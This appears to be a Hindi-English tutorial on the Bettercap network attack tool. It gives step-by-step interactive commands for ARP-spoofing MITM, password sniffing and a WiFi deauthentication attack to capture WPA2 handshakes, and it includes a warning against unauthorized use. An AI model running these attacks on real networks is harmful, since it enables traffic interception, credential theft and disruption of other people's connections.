Bettercap

Network Swiss Army Knife

⚡ Bettercap क्या है?

Bettercap एक modern, powerful और modular network MITM attack framework है। इसे "Swiss Army Knife of network hacking" कहा जाता है।

👉 MITM attacks, WiFi hacking, Bluetooth sniffing, network reconnaissance — यह सब कुछ एक tool में है। Written in Go, fast और actively maintained है।

🔍 Bettercap क्या-क्या कर सकता है

WiFi Hacking

WiFi deauth, handshake capture, password cracking

MITM Attacks

ARP spoofing, DNS spoofing, SSL stripping

Packet Sniffing

Real-time packet capture और analysis

Bluetooth/BLE

Bluetooth devices scan और sniffing

Network Discovery

LAN hosts, MAC addresses, OS detection

HTTP Proxy

Built-in proxy for request/response modification

⚙️ Kali NetHunter / Termux में Bettercap install

apt/goInstallation Commands

System Update

apt update && apt upgrade

Install Go (if not installed)

apt install golang

Install Bettercap (recommended via apt)

apt install bettercap

👉 Bettercap requires root permissions — all commands को su/sudo के साथ run करो

💻 Basic Commands (Use)

👉 Bettercap के interactive shell में commands run करो:

Start Bettercap interactive session

bettercap -iface wlan0

List network modules

help modules

Show network hosts

net.show

Start ARP spoofing MITM

set arp.spoof.targets 192.168.1.1; arp.spoof on

Start packet sniffer

net.sniffer on

Show sniffed passwords

net.sniff

🌐 Real Example (Practical समझ)

Example 1🎯 Complete MITM Attack Flow

Step-by-step MITM attack with Bettercap:

Step 1: Start Bettercap

bettercap -iface wlan0

Step 2: Discover network hosts

net.probe on

Step 3: Show discovered hosts

net.show

Step 4: Set ARP spoofing target

set arp.spoof.targets 192.168.1.1

Step 5: Start ARP spoofing

arp.spoof on

Step 6: Start sniffer

net.sniffer on
📊 Output समझो (Host Discovery)

मान लो net.show output कुछ ऐसा आता है:

IP Address MAC Address Hostname
192.168.1.1 00:11:22:33:44:55 router.local
192.168.1.10 AA:BB:CC:DD:EE:FF desktop-pc
192.168.1.15 11:22:33:44:55:66 laptop-user
192.168.1.20 FF:EE:DD:CC:BB:AA smartphone

🧠 इसका मतलब:

Router

192.168.1.1

Gateway device — MITM target

Victim

192.168.1.10

Desktop PC — traffic monitor कर सकते हो

Victim

192.168.1.15

Laptop — potential attack target

👉 इससे attacker को पता चल जाता है: Network में कौन-कौन से devices हैं, उनकी MAC addresses, और hostnames। MITM attack के लिए यह information critical है।

🔥 Advanced Example - WiFi Deauth Attack

👉 WiFi clients को disconnect करना (deauthentication):

Start WiFi module

wifi.recon on

Show nearby WiFi networks

wifi.show

Start deauth attack (disconnect clients)

set wifi.deauth.bssid 00:11:22:33:44:55; wifi.deauth on

Disconnect Clients

Network से users बाहर निकालना

Capture Handshake

WPA2 handshake capture करना

👉 Deauth का purpose: Users को disconnect करके reconnection करने पर WPA2 handshake capture करना → password crack करने के लिए

⚠️ CRITICAL WARNING

Bettercap एक बहुत powerful offensive tool है। Unauthorized use ILLEGAL है

Authorized use only:

  • अपना personal home network (testing purpose)
  • Pentesting contracts के साथ written permission
  • Certified training labs

🚫 Illegal Actions: Public WiFi, office networks, neighbor's WiFi, या बिना permission किसी भी network पर deauth/MITM attack

👉 Root required: MITM, WiFi attacks, और packet sniffing के लिए root permissions mandatory हैं

🧩 Related Tools

Ettercap

Classic MITM tool

Wireshark

Packet analyzer

Tcpdump

CLI packet capture

Aircrack-ng

WiFi auditing

💡 Simple समझ

Bettercap = "Hacking का Swiss Army Knife"

यह एक tool में सब कुछ है — MITM, WiFi hack, Bluetooth sniff, packet capture, और भी बहुत कुछ। Modern और powerful है।